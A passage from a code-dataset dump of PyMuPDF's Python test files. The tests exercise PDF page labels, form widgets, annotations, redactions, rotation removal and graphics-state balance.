        toc_text_new = pprint.pformat(toc_new, indent=4).split('\n')
        diff = difflib.unified_diff(
            toc_text_pdf,
            toc_text_new,
            lineterm='',
        )
        print('\n'.join(diff))
        # Check 'to' points are identical apart from rounding errors.
        #
        assert len(toc_new) == len(toc_pdf)
        for a, b in zip(toc_pdf, toc_new):
            a_dict = a[3]
            b_dict = b[3]
            if 'to' in a_dict:
                assert 'to' in b_dict
                a_to = a_dict['to']
                b_to = b_dict['to']
                assert isinstance(a_to, pymupdf.Point)
                assert isinstance(b_to, pymupdf.Point)
                if a_to != b_to:
                    print(f'Points not identical: {a_to=} {b_to=}.')
                # Allow < 0.01 rounding slack per coordinate.
                assert abs(a_to.x - b_to.x) < 0.01
                assert abs(a_to.y - b_to.y) < 0.01
21,361 | test_pagelabels.py | pymupdf_PyMuPDF/tests/test_pagelabels.py | """
Define some page labels in a PDF.
Check success in various aspects.
"""
import pymupdf
def make_doc():
    """Return a new PDF with 10 empty pages."""
    doc = pymupdf.open()
    for _ in range(10):
        doc.new_page()
    return doc
def make_labels():
    """Return the two page-label range rules used by these tests.

    Rule 1: decimal labels "A-1", "A-2", ... starting at page 0.
    Rule 2: uppercase Roman labels "I", "II", ... starting at page 4.
    """
    rule_decimal = {"startpage": 0, "prefix": "A-", "style": "D", "firstpagenum": 1}
    rule_roman = {"startpage": 4, "prefix": "", "style": "R", "firstpagenum": 1}
    return [rule_decimal, rule_roman]
def test_setlabels():
    """Set page labels on a 10-page PDF, then verify labels, number lookup
    and that the label rules round-trip unchanged."""
    doc = make_doc()
    doc.set_page_labels(make_labels())
    expected = ["A-1", "A-2", "A-3", "A-4", "I", "II", "III", "IV", "V", "VI"]
    actual = [page.get_label() for page in doc]
    assert actual == expected, f"page_labels={actual}"
    assert doc.get_page_numbers("V") == [8]
    assert doc.get_page_labels() == make_labels()
def test_labels_styleA():
    """Lowercase "a" and uppercase "A" label styles must index correctly."""
    doc = make_doc()
    rules = [
        {"startpage": 0, "prefix": "", "style": "a", "firstpagenum": 1},
        {"startpage": 5, "prefix": "", "style": "A", "firstpagenum": 1},
    ]
    doc.set_page_labels(rules)
    # Round-trip through bytes so labels are read from a freshly parsed file.
    pdfdata = doc.tobytes()
    doc.close()
    reopened = pymupdf.open("pdf", pdfdata)
    expected = ["a", "b", "c", "d", "e", "A", "B", "C", "D", "E"]
    assert [page.get_label() for page in reopened] == expected
    assert reopened.get_page_labels() == rules
| 1,742 | Python | .py | 49 | 30.693878 | 76 | 0.58076 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,362 | test_widgets.py | pymupdf_PyMuPDF/tests/test_widgets.py | # -*- coding: utf-8 -*-
"""
Test PDF field (widget) insertion.
"""
import pymupdf
import os
# Test-file locations.
scriptdir = os.path.abspath(os.path.dirname(__file__))
filename = os.path.join(scriptdir, "resources", "widgettest.pdf")
file_2333 = os.path.join(scriptdir, "resources", "test-2333.pdf")
# NOTE(review): module-level doc/page appear unused by the tests below,
# which create their own documents — possibly leftovers; confirm before removal.
doc = pymupdf.open()
page = doc.new_page()
gold = (1, 1, 0)  # define some colors
blue = (0, 0, 1)
gray = (0.9, 0.9, 0.9)
fontsize = 11.0  # define a fontsize
lineheight = fontsize + 4.0
rect = pymupdf.Rect(50, 72, 400, 200)  # common widget rectangle
def test_text():
    """Insert a styled text widget and re-read its field type."""
    document = pymupdf.open()
    target_page = document.new_page()
    widget = pymupdf.Widget()
    widget.field_name = "Textfield-1"
    widget.field_label = "arbitrary text - e.g. to help filling the field"
    widget.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
    widget.field_value = "Times-Roman"
    widget.rect = rect
    widget.fill_color = gold
    widget.border_color = blue
    widget.border_width = 0.3
    widget.border_style = "d"
    widget.border_dashes = (2, 3)
    widget.text_color = blue
    widget.text_font = "TiRo"  # Times-Roman
    widget.text_fontsize = fontsize
    widget.text_maxlen = 50  # restrict number of characters
    target_page.add_widget(widget)
    assert target_page.first_widget.field_type_string == "Text"
def test_checkbox():
    """Insert a checkbox widget, then make it read-only (checks #2350)."""
    document = pymupdf.open()
    target_page = document.new_page()
    box = pymupdf.Widget()
    box.border_style = "b"
    box.field_name = "Button-1"
    box.field_label = "a simple check box button"
    box.field_type = pymupdf.PDF_WIDGET_TYPE_CHECKBOX
    box.fill_color = gold
    box.rect = rect
    box.text_color = blue
    box.text_font = "ZaDb"
    box.field_value = True
    target_page.add_widget(box)
    assert target_page.first_widget.field_type_string == "CheckBox"
    # Check #2350 - setting checkbox to readonly.
    box.field_flags |= pymupdf.PDF_FIELD_IS_READ_ONLY
    box.update()
    path = f"{scriptdir}/test_checkbox.pdf"
    document.save(path)
    reopened = pymupdf.open(path)
    saved = reopened[0].first_widget
    assert saved
    assert saved.field_flags == pymupdf.PDF_FIELD_IS_READ_ONLY
def test_listbox():
    """Insert a list box widget with several choice values."""
    document = pymupdf.open()
    target_page = document.new_page()
    listbox = pymupdf.Widget()
    listbox.field_name = "ListBox-1"
    listbox.field_label = "is not a drop down: scroll with cursor in field"
    listbox.field_type = pymupdf.PDF_WIDGET_TYPE_LISTBOX
    listbox.field_flags = pymupdf.PDF_CH_FIELD_IS_COMMIT_ON_SEL_CHANGE
    listbox.fill_color = gold
    listbox.choice_values = (
        "Frankfurt",
        "Hamburg",
        "Stuttgart",
        "Hannover",
        "Berlin",
        "München",
        "Köln",
        "Potsdam",
    )
    listbox.rect = rect
    listbox.text_color = blue
    listbox.text_fontsize = fontsize
    listbox.field_value = listbox.choice_values[-1]
    print("About to add '%s'" % listbox.field_name)
    target_page.add_widget(listbox)
    assert target_page.first_widget.field_type_string == "ListBox"
def test_combobox():
    """Insert an editable combo box widget with many choice values."""
    document = pymupdf.open()
    target_page = document.new_page()
    combo = pymupdf.Widget()
    combo.field_name = "ComboBox-1"
    combo.field_label = "an editable combo box ..."
    combo.field_type = pymupdf.PDF_WIDGET_TYPE_COMBOBOX
    combo.field_flags = (
        pymupdf.PDF_CH_FIELD_IS_COMMIT_ON_SEL_CHANGE | pymupdf.PDF_CH_FIELD_IS_EDIT
    )
    combo.fill_color = gold
    combo.choice_values = (
        "Spanien",
        "Frankreich",
        "Holland",
        "Dänemark",
        "Schweden",
        "Norwegen",
        "England",
        "Polen",
        "Russland",
        "Italien",
        "Portugal",
        "Griechenland",
    )
    combo.rect = rect
    combo.text_color = blue
    combo.text_fontsize = fontsize
    combo.field_value = combo.choice_values[-1]
    target_page.add_widget(combo)
    assert target_page.first_widget.field_type_string == "ComboBox"
def test_text2():
    """Insert a multi-line text widget containing tabs and newlines."""
    document = pymupdf.open()
    document.new_page()
    target_page = list(document.pages())[0]
    widget = pymupdf.Widget()
    widget.field_name = "textfield-2"
    widget.field_label = "multi-line text with tabs is also possible!"
    widget.field_flags = pymupdf.PDF_TX_FIELD_IS_MULTILINE
    widget.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
    widget.fill_color = gray
    widget.rect = rect
    widget.text_color = blue
    widget.text_font = "TiRo"
    widget.text_fontsize = fontsize
    widget.field_value = "This\n\tis\n\t\ta\n\t\t\tmulti-\n\t\tline\n\ttext."
    target_page.add_widget(widget)
    first = list(target_page.widgets())[0]
    assert first.field_type_string == "Text"
def test_2333():
    """#2333: toggling radio/checkbox widgets must update /AS and /V entries.

    The expected xref numbers (635-638, 127) are specific to test-2333.pdf.
    """
    doc = pymupdf.open(file_2333)
    page = doc[0]
    def values():
        # Snapshot the appearance states of the four widgets plus the
        # field value, as raw strings from the xref table.
        return set(
            (
                doc.xref_get_key(635, "AS")[1],
                doc.xref_get_key(636, "AS")[1],
                doc.xref_get_key(637, "AS")[1],
                doc.xref_get_key(638, "AS")[1],
                doc.xref_get_key(127, "V")[1],
            )
        )
    for i, xref in enumerate((635, 636, 637, 638)):
        w = page.load_widget(xref)
        # Switch widget on: exactly one widget shows state i, others "/Off".
        w.field_value = True
        w.update()
        assert values() == set(("/Off", f"{i}", f"/{i}"))
        # Switch back off: everything must report an off state again.
        w.field_value = False
        w.update()
        assert values() == set(("Off", "/Off"))
def test_2411():
    """Combo box choice values may be given as lists, tuples, or plain strings."""
    document = pymupdf.open()
    target_page = document.new_page()
    combo = pymupdf.Widget()
    combo.field_flags = (
        pymupdf.PDF_CH_FIELD_IS_COMBO
        | pymupdf.PDF_CH_FIELD_IS_EDIT
        | pymupdf.PDF_CH_FIELD_IS_COMMIT_ON_SEL_CHANGE
    )
    combo.field_name = "ComboBox-1"
    combo.field_label = "an editable combo box ..."
    combo.field_type = pymupdf.PDF_WIDGET_TYPE_COMBOBOX
    combo.fill_color = pymupdf.pdfcolor["gold"]
    combo.rect = pymupdf.Rect(100, 100, 300, 200)
    combo.choice_values = [
        ["Spain", "ES"],  # double value as list
        ("Italy", "I"),  # double value as tuple
        "Portugal",  # single value
    ]
    target_page.add_widget(combo)
def test_2391():
    """Confirm that multiple times setting a checkbox to ON/True/Yes will work.

    The document is serialized and re-opened five times; each round every
    checkbox must still report its "on" state and is set to it again before
    the next round.
    """
    doc = pymupdf.open(f"{scriptdir}/resources/widgettest.pdf")
    page = doc[0]
    # First pass: switch every checkbox on.
    for field in page.widgets(types=[pymupdf.PDF_WIDGET_TYPE_CHECKBOX]):
        field.field_value = True
        field.update()
    for i in range(5):
        pdfdata = doc.tobytes()
        doc.close()
        doc = pymupdf.open("pdf", pdfdata)
        page = doc[0]
        for field in page.widgets(types=[pymupdf.PDF_WIDGET_TYPE_CHECKBOX]):
            # The checkbox must survive the save/reopen round trip switched on.
            assert field.field_value == field.on_state()
            # Re-set the value each round. The original code assigned to a
            # throwaway local ("field_field_value = ..."), so the repeated
            # setting this test is about was never actually performed.
            field.field_value = field.on_state()
            field.update()
def test_3216():
    """#3216: repeatedly deleting first_widget must terminate leaving no widgets."""
    document = pymupdf.open(filename)
    for target_page in document:
        while True:
            w = target_page.first_widget
            print(f"{w=}")
            if not w:
                break
            target_page.delete_widget(w)
def test_add_widget():
    """Insert a push button widget carrying a JavaScript action."""
    document = pymupdf.open()
    target_page = document.new_page()
    button = pymupdf.Widget()
    button.field_type = pymupdf.PDF_WIDGET_TYPE_BUTTON
    button.rect = pymupdf.Rect(5, 5, 20, 20)
    button.field_flags = pymupdf.PDF_BTN_FIELD_IS_PUSHBUTTON
    button.field_name = "button"
    button.fill_color = (0, 0, 1)
    button.script = "app.alert('Hello, PDF!');"
    target_page.add_widget(button)
def test_interfield_calculation():
    """Confirm correct working of interfield calculations.
    We are going to create three pages with a computed result field each.
    Tests the fix for https://github.com/pymupdf/PyMuPDF/issues/3402.
    """
    # Field bboxes (same on each page)
    r1 = pymupdf.Rect(100, 100, 300, 120)
    r2 = pymupdf.Rect(100, 130, 300, 150)
    r3 = pymupdf.Rect(100, 180, 300, 200)
    doc = pymupdf.open()
    pdf = pymupdf._as_pdf_document(doc)  # we need underlying PDF document
    # Make PDF name object for "CO" because it is not defined in MuPDF.
    CO_name = pymupdf.mupdf.pdf_new_name("CO")  # = PDF_NAME(CO)
    for i in range(3):
        page = doc.new_page()
        # First operand field, value differs per page.
        w = pymupdf.Widget()
        w.field_name = f"NUM1{page.number}"
        w.rect = r1
        w.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
        w.field_value = f"{i*100+1}"
        w.field_flags = 2
        page.add_widget(w)
        # Second operand field, constant value.
        w = pymupdf.Widget()
        w.field_name = f"NUM2{page.number}"
        w.rect = r2
        w.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
        w.field_value = "200"
        w.field_flags = 2
        page.add_widget(w)
        # Result field carrying the calculation script.
        w = pymupdf.Widget()
        w.field_name = f"RESULT{page.number}"
        w.rect = r3
        w.field_type = pymupdf.PDF_WIDGET_TYPE_TEXT
        w.field_value = "Result?"
        # Script that adds previous two fields.
        w.script_calc = f"""AFSimple_Calculate("SUM",
        new Array("NUM1{page.number}", "NUM2{page.number}"));"""
        page.add_widget(w)
        # Access the inter-field calculation array. It contains a reference to
        # all fields which have a JavaScript stored in their "script_calc"
        # property, i.e. an "AA/C" entry.
        # Every iteration adds another such field, so this array's length must
        # always equal the loop index.
        if i == 0:  # only need to execute this on first time through
            CO = pymupdf.mupdf.pdf_dict_getl(
                pymupdf.mupdf.pdf_trailer(pdf),
                pymupdf.PDF_NAME("Root"),
                pymupdf.PDF_NAME("AcroForm"),
                CO_name,
            )
        # we confirm CO is an array of foreseeable length
        assert pymupdf.mupdf.pdf_array_len(CO) == i + 1
        # the xref of the i-th item must equal that of the last widget
        assert (
            pymupdf.mupdf.pdf_to_num(pymupdf.mupdf.pdf_array_get(CO, i))
            == list(page.widgets())[-1].xref
        )
def test_3950():
    """Field labels of all widgets must match the expected template strings."""
    path = os.path.normpath(f'{__file__}/../../tests/resources/test_3950.pdf')
    labels = []
    with pymupdf.open(path) as document:
        for page in document:
            for widget in page.widgets():
                labels.append(widget.field_label)
                print(f'test_3950(): {widget.field_label=}.')
    assert labels == [
        '{{ named_insured }}',
        '{{ policy_period_start_date }}',
        '{{ policy_period_end_date }}',
        '{{ insurance_line }}',
    ]
| 10,684 | Python | .py | 294 | 29.530612 | 83 | 0.616084 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,363 | test_remove-rotation.py | pymupdf_PyMuPDF/tests/test_remove-rotation.py | import os
import pymupdf
from gentle_compare import gentle_compare
scriptdir = os.path.dirname(__file__)  # directory of this test file
def test_remove_rotation():
    """Remove rotation verifying identical appearance and text."""
    filename = os.path.join(scriptdir, "resources", "test-2812.pdf")
    doc = pymupdf.open(filename)
    # We always create fresh pages to avoid false positives from cache content.
    # Text on these pages consists of pairwise different strings, sorting by
    # these strings must therefore yield identical bounding boxes.
    for i in range(1, doc.page_count):
        assert doc[i].rotation  # must be a rotated page
        pix0 = doc[i].get_pixmap()  # make image
        words0 = []
        # Map each word bbox into derotated coordinates for later comparison.
        for w in doc[i].get_text("words"):
            words0.append(list(pymupdf.Rect(w[:4]) * doc[i].rotation_matrix) + [w[4]])
        words0.sort(key=lambda w: w[4])  # sort by word strings
        # derotate page and confirm nothing else has changed
        doc[i].remove_rotation()
        assert doc[i].rotation == 0
        pix1 = doc[i].get_pixmap()
        words1 = doc[i].get_text("words")
        words1.sort(key=lambda w: w[4])  # sort by word strings
        # Identical pixmap digests prove unchanged visual appearance.
        assert pix1.digest == pix0.digest, f"{pix1.digest}/{pix0.digest}"
        assert gentle_compare(words0, words1)
| 1,280 | Python | .py | 26 | 42.538462 | 86 | 0.6656 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,364 | test_annots.py | pymupdf_PyMuPDF/tests/test_annots.py | # -*- coding: utf-8 -*-
"""
Test PDF annotation insertions.
"""
import os
import pymupdf
import gentle_compare
# Use a fixed stem for generated annotation ids so output is reproducible.
pymupdf.TOOLS.set_annot_stem("jorj")
red = (1, 0, 0)
blue = (0, 0, 1)
gold = (1, 1, 0)
green = (0, 1, 0)
scriptdir = os.path.dirname(__file__)
displ = pymupdf.Rect(0, 50, 0, 50)  # displacement used by some tests
r = pymupdf.Rect(72, 72, 220, 100)  # small rectangle for text/stamp annots
t1 = "têxt üsès Lätiñ charß,\nEUR: €, mu: µ, super scripts: ²³!"
rect = pymupdf.Rect(100, 100, 200, 200)  # default annotation rectangle
def test_caret():
    """A caret annotation reports type (14, "Caret") and survives update."""
    document = pymupdf.open()
    target_page = document.new_page()
    caret = target_page.add_caret_annot(rect.tl)
    assert caret.type == (14, "Caret")
    caret.update(rotate=20)
    target_page.annot_names()
    target_page.annot_xrefs()
def test_freetext():
    """Create a styled FreeText annotation and verify its type."""
    document = pymupdf.open()
    created = document.new_page().add_freetext_annot(
        rect,
        t1,
        fontsize=10,
        rotate=90,
        text_color=blue,
        fill_color=gold,
        align=pymupdf.TEXT_ALIGN_CENTER,
    )
    created.set_border(width=0.3, dashes=[2])
    created.update(text_color=blue, fill_color=gold)
    assert created.type == (2, "FreeText")
def test_text():
    """A text ("sticky note") annotation reports type (0, "Text")."""
    document = pymupdf.open()
    created = document.new_page().add_text_annot(r.tl, t1)
    assert created.type == (0, "Text")
def test_highlight():
    """A highlight annotation reports type (8, "Highlight")."""
    document = pymupdf.open()
    created = document.new_page().add_highlight_annot(rect)
    assert created.type == (8, "Highlight")
def test_underline():
    """An underline annotation reports type (9, "Underline")."""
    document = pymupdf.open()
    created = document.new_page().add_underline_annot(rect)
    assert created.type == (9, "Underline")
def test_squiggly():
    """A squiggly annotation reports type (10, "Squiggly")."""
    document = pymupdf.open()
    created = document.new_page().add_squiggly_annot(rect)
    assert created.type == (10, "Squiggly")
def test_strikeout():
    """A strikeout annotation reports type (11, "StrikeOut") and can be deleted."""
    document = pymupdf.open()
    target_page = document.new_page()
    created = target_page.add_strikeout_annot(rect)
    assert created.type == (11, "StrikeOut")
    target_page.delete_annot(created)
def test_polyline():
    """Create ten polyline annotations with distinct line-end styles, re-read them."""
    document = pymupdf.open()
    target_page = document.new_page()
    table_rect = target_page.rect + (100, 36, -100, -36)
    cells = pymupdf.make_table(table_rect, rows=10)
    for style in range(10):
        created = target_page.add_polyline_annot((cells[style][0].bl, cells[style][0].br))
        created.set_line_ends(style, style)
        created.update()
    for style, created in enumerate(target_page.annots()):
        assert created.line_ends == (style, style)
        assert created.type == (7, "PolyLine")
def test_polygon():
    """A polygon annotation reports type (6, "Polygon")."""
    document = pymupdf.open()
    created = document.new_page().add_polygon_annot([rect.bl, rect.tr, rect.br, rect.tl])
    assert created.type == (6, "Polygon")
def test_line():
    """Create ten line annotations with distinct line-end styles, re-read them."""
    document = pymupdf.open()
    target_page = document.new_page()
    table_rect = target_page.rect + (100, 36, -100, -36)
    cells = pymupdf.make_table(table_rect, rows=10)
    for style in range(10):
        created = target_page.add_line_annot(cells[style][0].bl, cells[style][0].br)
        created.set_line_ends(style, style)
        created.update()
    for style, created in enumerate(target_page.annots()):
        assert created.line_ends == (style, style)
        assert created.type == (3, "Line")
def test_square():
    """A rectangle annotation reports type (4, "Square")."""
    document = pymupdf.open()
    created = document.new_page().add_rect_annot(rect)
    assert created.type == (4, "Square")
def test_circle():
    """A circle annotation reports type (5, "Circle")."""
    document = pymupdf.open()
    created = document.new_page().add_circle_annot(rect)
    assert created.type == (5, "Circle")
def test_fileattachment():
    """A file attachment annotation reports type (17, "FileAttachment")."""
    document = pymupdf.open()
    created = document.new_page().add_file_annot(
        rect.tl, b"just anything for testing", "testdata.txt"
    )
    assert created.type == (17, "FileAttachment")
def test_stamp():
    """A stamp annotation can be created and re-loaded by id and by xref."""
    document = pymupdf.open()
    target_page = document.new_page()
    stamp = target_page.add_stamp_annot(r, stamp=10)
    assert stamp.type == (13, "Stamp")
    ident = stamp.info["id"]
    xref = stamp.xref
    target_page.load_annot(ident)
    target_page.load_annot(xref)
    target_page = document.reload_page(target_page)
def test_redact1():
    """Exercise redaction annotation creation, info, popup, then apply."""
    document = pymupdf.open()
    target_page = document.new_page()
    created = target_page.add_redact_annot(r, text="Hello")
    created.update(cross_out=True, rotate=-1)
    assert created.type == (12, "Redact")
    created.get_pixmap()
    created.set_info(created.info)
    assert not created.has_popup
    created.set_popup(r)
    assert created.popup_rect == r
    target_page.apply_redactions()
def test_redact2():
    """With text=1, redaction keeps page text but removes vector graphics."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not executing 'test_redact2' in classic")
        return
    document = pymupdf.open(os.path.join(scriptdir, "resources", "symbol-list.pdf"))
    target_page = document[0]
    words_before = target_page.get_text("words")
    target_page.add_redact_annot(target_page.rect)
    target_page.apply_redactions(text=1)
    words_after = target_page.get_text("words")
    # Text-keeping redaction only works from MuPDF 1.24.2 on.
    if pymupdf.mupdf_version_tuple < (1, 24, 2):
        assert words_after == []
    else:
        assert words_after == words_before
    assert not target_page.get_drawings()
def test_redact3():
    """Redacting the full page must remove both text and vector graphics."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not executing 'test_redact3' in classic")
        return
    document = pymupdf.open(os.path.join(scriptdir, "resources", "symbol-list.pdf"))
    target_page = document[0]
    target_page.add_redact_annot(target_page.rect)
    target_page.apply_redactions()
    assert not target_page.get_text("words")
    assert not target_page.get_drawings()
def test_redact4():
    """With graphics=0, redaction removes text but keeps line art untouched."""
    if not hasattr(pymupdf, "mupdf"):
        print("Not executing 'test_redact4' in classic")
        return
    document = pymupdf.open(os.path.join(scriptdir, "resources", "symbol-list.pdf"))
    target_page = document[0]
    line_art = target_page.get_drawings()
    target_page.add_redact_annot(target_page.rect)
    target_page.apply_redactions(graphics=0)
    assert not target_page.get_text("words")
    assert line_art == target_page.get_drawings()
def test_1645():
    '''
    Test fix for #1645.

    Adds a FreeText annotation honoring the page rotation and compares the
    saved file byte-for-byte against a stored expected file, chosen by the
    MuPDF version (appearance streams differ between versions).
    '''
    path_in = os.path.abspath( f'{__file__}/../resources/symbol-list.pdf')
    if pymupdf.mupdf_version_tuple >= (1, 25):
        path_expected = os.path.abspath( f'{__file__}/../../tests/resources/test_1645_expected_1.25.pdf')
    elif pymupdf.mupdf_version_tuple >= (1, 24, 2):
        path_expected = os.path.abspath( f'{__file__}/../../tests/resources/test_1645_expected_1.24.2.pdf')
    elif pymupdf.mupdf_version_tuple >= (1, 24):
        path_expected = os.path.abspath( f'{__file__}/../../tests/resources/test_1645_expected_1.24.pdf')
    else:
        path_expected = os.path.abspath( f'{__file__}/../resources/test_1645_expected_1.22.pdf')
    path_out = os.path.abspath( f'{__file__}/../test_1645_out.pdf')
    doc = pymupdf.open(path_in)
    page = doc[0]
    page_bounds = page.bound()
    # Top-left corner of the (possibly rotated) page.
    annot_loc = pymupdf.Rect(page_bounds.x0, page_bounds.y0, page_bounds.x0 + 75, page_bounds.y0 + 15)
    # Check type of page.derotation_matrix - this is #2911.
    assert isinstance(page.derotation_matrix, pymupdf.Matrix), \
            f'Bad type for page.derotation_matrix: {type(page.derotation_matrix)=} {page.derotation_matrix=}.'
    page.add_freetext_annot(
        annot_loc * page.derotation_matrix,
        "TEST",
        fontsize=18,
        fill_color=pymupdf.utils.getColor("FIREBRICK1"),
        rotate=page.rotation,
    )
    # no_new_id keeps the file ID stable so the byte comparison can succeed.
    doc.save(path_out, garbage=1, deflate=True, no_new_id=True)
    print(f'Have created {path_out}. comparing with {path_expected}.')
    with open( path_out, 'rb') as f:
        out = f.read()
    with open( path_expected, 'rb') as f:
        expected = f.read()
    assert out == expected, f'Files differ: {path_out} {path_expected}'
def test_1824():
    '''
    #1824: applying redactions overlapping a transparent image must not
    crash with a segmentation fault.
    '''
    source = os.path.abspath(f'{__file__}/../resources/test_1824.pdf')
    document = pymupdf.open(source)
    document[0].apply_redactions()
def test_2270():
    '''
    https://github.com/pymupdf/PyMuPDF/issues/2270

    Text extraction from a FreeText annotation must return the annotation's
    content through every extraction route.
    '''
    path = os.path.abspath( f'{__file__}/../../tests/resources/test_2270.pdf')
    with pymupdf.open(path) as document:
        for page_number, page in enumerate(document):
            for textBox in page.annots(types=(pymupdf.PDF_ANNOT_FREE_TEXT,pymupdf.PDF_ANNOT_TEXT)):
                # Diagnostic dump of all extraction routes.
                print("textBox.type :", textBox.type)
                print("textBox.get_text('words') : ", textBox.get_text('words'))
                print("textBox.get_text('text') : ", textBox.get_text('text'))
                print("textBox.get_textbox(textBox.rect) : ", textBox.get_textbox(textBox.rect))
                print("textBox.info['content'] : ", textBox.info['content'])
                # All routes must agree on the annotation text "abc123".
                assert textBox.type == (2, 'FreeText')
                assert textBox.get_text('words')[0][4] == 'abc123'
                assert textBox.get_text('text') == 'abc123\n'
                assert textBox.get_textbox(textBox.rect) == 'abc123'
                assert textBox.info['content'] == 'abc123'
                if hasattr(pymupdf, 'mupdf'):
                    # Additional check that Annot.get_textpage() returns a
                    # TextPage that works with page.get_text() - prior to
                    # 2024-01-30 the TextPage had no `.parent` member.
                    textpage = textBox.get_textpage()
                    text = page.get_text()
                    print(f'{text=}')
                    text = page.get_text(textpage=textpage)
                    print(f'{text=}')
                    print(f'{getattr(textpage, "parent")=}')
def test_2934_add_redact_annot():
    '''
    Test fix for bug mentioned in #2934: add_redact_annot() must accept a
    bbox taken from the JSON text extraction of a stream-opened document.
    '''
    import json
    path = os.path.abspath(f'{__file__}/../../tests/resources/mupdf_explored.pdf')
    with open(path, 'rb') as f:
        data = f.read()
    doc = pymupdf.Document(stream=data)
    print(f'Is PDF: {doc.is_pdf}')
    print(f'Number of pages: {doc.page_count}')
    page = doc[0]
    page_json_data = json.loads(doc[0].get_text("json"))
    span = page_json_data.get("blocks")[0].get("lines")[0].get("spans")[0]
    page.add_redact_annot(span["bbox"], text="")
    page.apply_redactions()
def test_2969():
    '''
    https://github.com/pymupdf/PyMuPDF/issues/2969
    Accessing .next on an annotation must not crash.
    '''
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_2969.pdf')
    document = pymupdf.open(path)
    annotations = list(document[0].annots())
    annotations[0].next
def test_file_info():
    """Collect Annot.file_info of all file-attachment annotations and verify."""
    path = os.path.abspath(f'{__file__}/../../tests/resources/test_annot_file_info.pdf')
    document = pymupdf.open(path)
    collected = []
    for i, page in enumerate(document):
        print(f'{i=}')
        for j, annotation in enumerate(page.annots()):
            print(f'{j=} {annotation=}')
            t = annotation.type
            print(f'{t=}')
            if t[0] == pymupdf.PDF_ANNOT_FILE_ATTACHMENT:
                file_info = annotation.file_info
                print(f'{file_info=}')
                collected.append(file_info)
    assert collected == [
        {'filename': 'example.pdf', 'descender': '', 'length': 8416, 'size': 8992},
        {'filename': 'photo1.jpeg', 'descender': '', 'length': 10154, 'size': 8012},
    ]
def test_3131():
    """#3131: Annot.next must work when another annotation follows."""
    document = pymupdf.open()
    target_page = document.new_page()
    target_page.add_line_annot((0, 0), (1, 1))
    target_page.add_line_annot((1, 0), (0, 1))
    first, _ = target_page.annots()
    first.next.type
def test_3209():
    """Ink annotation round trip: vertices must be preserved exactly."""
    document = pymupdf.Document(filetype="pdf")
    target_page = document.new_page()
    target_page.add_ink_annot([[(300, 300), (400, 380), (350, 350)]])
    found = list(target_page.annots())
    assert len(found) == 1
    assert found[0].vertices == [[(300.0, 300.0), (400.0, 380.0), (350.0, 350.0)]]
    out_path = os.path.abspath(f'{__file__}/../../tests/test_3209_out.pdf')
    # Check the output PDF that the annotation is correctly drawn
    document.save(out_path)
def test_3863():
    """#3863: full-page redactions on rotated pages must keep page geometry.

    Redacts every page (swapping width/height for 90/270-rotated pages),
    renders each resulting page to PNG and compares against stored expected
    PNGs with a small RMS tolerance.
    """
    if pymupdf.mupdf_version_tuple < (1, 24, 10):
        print(f'test_3863(): not running because {pymupdf.mupdf_version_tuple=} < 1.24.10.')
        return
    path_in = os.path.normpath(f'{__file__}/../../tests/resources/test_3863.pdf')
    path_out = os.path.normpath(f'{__file__}/../../tests/test_3863.pdf.pdf')
    # Create redacted PDF.
    print(f'Loading {path_in=}.')
    with pymupdf.open(path_in) as document:
        for num, page in enumerate(document):
            print(f"Page {num + 1} - {page.rect}:")
            for image in page.get_images(full=True):
                print(f" - Image: {image}")
            redact_rect = page.rect
            # For rotated pages the unrotated mediabox has swapped sides.
            if page.rotation in (90, 270):
                redact_rect = pymupdf.Rect(0, 0, page.rect.height, page.rect.width)
            page.add_redact_annot(redact_rect)
            page.apply_redactions(images=pymupdf.PDF_REDACT_IMAGE_NONE)
        print(f'Writing to {path_out=}.')
        document.save(path_out)
    with pymupdf.open(path_out) as document:
        assert len(document) == 8
        # Create PNG for each page of redacted PDF.
        for num, page in enumerate(document):
            path_png = f'{path_out}.{num}.png'
            pixmap = page.get_pixmap()
            print(f'Writing to {path_png=}.')
            pixmap.save(path_png)
        # Compare with expected png.
        print(f'Comparing page PNGs with expected PNGs.')
        for num, _ in enumerate(document):
            path_png = f'{path_out}.{num}.png'
            path_png_expected = f'{path_in}.pdf.{num}.png'
            print(f'{path_png=}.')
            print(f'{path_png_expected=}.')
            rms = gentle_compare.pixmaps_rms(path_png, path_png_expected, ' ')
            # We get small differences in sysinstall tests, where some
            # thirdparty libraries can differ.
            assert rms < 1
| 13,734 | Python | .py | 353 | 31.824363 | 110 | 0.604371 | pymupdf/PyMuPDF | 5,009 | 480 | 32 | AGPL-3.0 | 9/5/2024, 5:12:54 PM (Europe/Amsterdam) |
21,365 | test_balance_count.py | pymupdf_PyMuPDF/tests/test_balance_count.py | import pymupdf
def test_q_count():
    """Testing graphics state balances and wrap_contents().
    Take page's contents and generate various imbalanced graphics state
    situations. Each time compare q-count with expected results.
    Finally confirm we are out of balance using "is_wrapped", wrap the
    contents object(s) via "wrap_contents()" and confirm success.
    PDF commands "q" / "Q" stand for "push", respectively "pop".
    """
    doc = pymupdf.open()
    page = doc.new_page()
    # the page has no /Contents objects at all yet. Create one causing
    # an initial imbalance (so prepended "q" is needed)
    pymupdf.TOOLS._insert_contents(page, b"Q", True)  # append
    # _count_q_balance() returns (missing pushes, missing pops).
    assert page._count_q_balance() == (1, 0)
    assert page.is_wrapped is False
    # Prepend more data that yield a different type of imbalanced contents:
    # Although counts of q and Q are equal now, the unshielded 'cm' before
    # the first 'q' makes the contents unusable for insertions.
    pymupdf.TOOLS._insert_contents(page, b"1 0 0 -1 0 0 cm q ", False)  # prepend
    # is_wrapped semantics changed in MuPDF 1.24.2.
    if pymupdf.mupdf_version_tuple >= (1, 24, 2):
        assert page.is_wrapped is False
    else:
        assert page.is_wrapped
    if page._count_q_balance() == (0, 0):
        print("imbalance undetected by q balance count")
    text = "Hello, World!"
    page.insert_text((100, 100), text)  # establishes balance!
    # this should have produced a balanced graphics state
